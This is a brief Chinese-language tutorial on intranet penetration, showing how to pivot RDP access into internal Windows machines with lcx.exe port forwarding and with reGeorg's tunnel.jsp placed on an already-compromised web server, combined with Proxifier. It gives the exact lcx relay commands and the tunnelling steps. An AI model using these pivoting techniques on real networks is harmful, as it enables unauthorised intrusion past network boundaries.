内网渗透_win_socks代理_reGeorg+proxifier

遇到内网windows机器，如果想远程登陆，通常得通过代理，常用的nc、lcx 工具可满足要求。

如 lcx 示例：

• 两台机器上均上传lcx.exe
• 在 xp机器（公网）上执行 lcx.exe -listen 51 33891
• 在 03机器（内网）上执行 lcx.exe -slave 192.168.100.16 51 192.168.32.137 3389
• 在 xp机器（公网）上 mstsc 127.0.0.1:33891 连接

这里讲下 reGeorg 的多种搭配使用。

reGeorg+proxifier

测试前提是目标服务器已经getshell。
1.将 reGeorgSocksProxy 中的 tunnel.jsp 文件放置到目标服务器web目录，查看能否正常访问（如图）。

2.配置好后通过 reGeory 来打通本地和目标的通道（如图显示成功连接）

3.配置proxifier
打开proxifier，选择Profile -> Proxy Server -> add

选择Profile -> Proxification Rules

配置好之后，点击屏幕左下角的开始菜单，输入mstsc，会出现mstsc，右键它，并选择Proxifier ->Proxy Socks5 127.0.0.1，然后登陆目标内网ip。